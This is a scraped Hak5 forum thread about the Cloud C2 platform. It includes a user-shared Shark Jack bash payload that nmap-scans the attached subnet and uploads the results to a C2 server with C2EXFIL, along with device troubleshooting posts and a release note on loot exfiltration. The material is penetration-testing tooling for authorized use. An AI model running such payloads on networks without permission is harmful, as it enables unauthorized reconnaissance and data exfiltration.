%CD%\payload_C2_Internet_Tester.sh IF EXIST "%CD%\payload_Internet_Tester.sh" del /f %CD%\payload_Internet_Tester.sh IF EXIST "%CD%\payload_default.sh" del /f %CD%\payload_default.sh IF EXIST "%CD%\sharklib.sh" del /f %CD%\sharklib.sh EXIT /B
  19. Hey y'all, just wanted to share my slightly modified nmap scan payload. It scans a bunch of ports, saves the output with a date stamp and multiple output types, and then uploads the loot to the C2 server. #!/bin/bash # # Title: Custom Nmap Payload for Shark Jack # Author: Flatlinebb # Version: 1.02 # # Scans target subnet with Nmap using specified options. Saves each scan result # to loot storage folder. Uploads loot to your C2 server # # Red ...........Setup # Amber..........Scanning # Green..........Finished # # See nmap --help for options. Default "-sP" ping scans the address space for # fast host discovery. NMAP_OPTIONS="-p 21,22,23,53,69,80,123,139,443,445,554,1812,3389,5220,2022,4242,4343,5000,5650,5655,5670,5800,5900,8080,8333,8222,8765,8008,8009,8181,8282,8383,8484,8888,8443,9000,10000,32400,32401,32402,49153 --open" LOOT_DIR=/root/loot/nmap SCAN_DIR=/etc/shark/nmap function finish() { LED CLEANUP # Kill Nmap echo $1 wait $1 kill $1 &> /dev/null # Exfiltrate all loot files FILES="$LOOT_DIR/*.*" for f in $FILES; do C2EXFIL STRING $f $SUBNET; done # Sync filesystem echo $SCAN_M > $SCAN_FILE sync sleep 1 LED FINISH sleep 1 # Halt system halt } function setup() { LED SETUP # Create loot directory mkdir -p $LOOT_DIR &> /dev/null # Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+ NETMODE DHCP_CLIENT # Wait for an IP address to be obtained while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done # Create tmp scan directory mkdir -p $SCAN_DIR &> /dev/null # Create tmp scan file if it doesn't exist SCAN_FILE=$SCAN_DIR/scan-count if [ ! -f $SCAN_FILE ]; then touch $SCAN_FILE && echo 0 > $SCAN_FILE fi # Find IP address and subnet while [ -z "$SUBNET" ]; do sleep 1 && find_subnet done } function find_subnet() { SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') } function run() { # Run setup setup SCAN_N=$(cat $SCAN_FILE) SCAN_M=$(( $SCAN_N + 1 )) LED ATTACK # Connect to Cloud C2 C2CONNECT # Wait until Cloud C2 connection is established while ! pgrep cc-client; do sleep 1; done # Start scan nmap $NMAP_OPTIONS $SUBNET -oA $LOOT_DIR/nmap-scan_$SCAN_M_`date +"%Y-%m-%d_%H%M%S"` &>/dev/null & tpid=$! sleep 1 finish $tpid } # Run payload run & Obligatory github link: https://github.com/flatlinebb/sharkjack-payloads/blob/master/payloads/library/recon/Custom nmap payload/payload.sh
  20. I'm trying to test a few things with a self hosted C2 and a Tetra on the same LAN. since it want setup to work both internal and external via a host name, I setup an a record on my internal DNS so that the external DNS name will resolve to the internal IP while on the same LAN. This issue is getting the Tetra to look to my DNS server automatically. I'm currently using eth0 (wired) for my network connection. What I would like is for the Tetra to get its DNS information from the same DHCP server that is handing out it IP address. I have tried removing the "Option DNS 8.8.8.8, 8.8.4.4" from /etc/config/network under bot WAN (eth0) and WWAN with no luck. I know that I can edit the /etc/resolve.conf file (currently pointed to 127.0.01) or add a static entry to /etc/hosts (which I have done to get things working internally for now), but I'm looking for a means to do this via the DHCP issues DNS servers so that it will revolved the host name both internally and externally based on the network that it is connected to. Any suggestions?
  21. Hi I'm currently playing around with the signal owl. I'm trying to include it into my c2 instance which doesn't work. The Signal Owl is connecting to my open wlan but it looks like it isn't connecting. I copied the device.config to the /etc/directory to configure the C2 server. This worked on the pineapple before. Anyone experience the same issues? The c2 server is running on TCP 443 with SSL (letsencrypt). BusyBox v1.30.1 () built-in shell (ash) .___. {o,o} /)__) Hak5 Signal Owl " " Version 1.0.1 ======================================= Built on OpenWRT 19.07 =======================================
  22. I have managed to make screencrab take screenshots succfully, but cant get it to connect to the wifi/C2 server. I've tried many forms of the config.txt file in order for it to work (of course, Iv'e also placed the device.config in the SD root). can anybody please upload a sample of config.txt file including a pseudo ssid and password?
  23. Hi, The first 10 months of feedback has been incredible, and we are excited to bring you some epic new features and enhancements to the platform with Cloud C2 version 2.0.0! This release adds support for the latest Hak5 devices, including the Screen Crab, Signal Owl and Shark Jack. It also features a protocol enhancement that reduces network overhead and bandwidth for deployed devices. This release includes a LOOT feature, allowing you to easily exfiltrate any arbitrary data from the target network using the C2 protocol. Accessible from the new Loot menu within each device type, the Loot view allows you to sort, view and export collected files. An accompanying C2EXFIL command for all Cloud C2 enabled devices can be used in your modules and payloads to send files up to the server. With this release, all deployed devices will need to be updated to their latest firmware versions, so be mindful when updating if you have devices deployed in the field. As always, thank you for your feedback and we feel free to join the discussion within the Hak5 community.
×
×
  • Create New...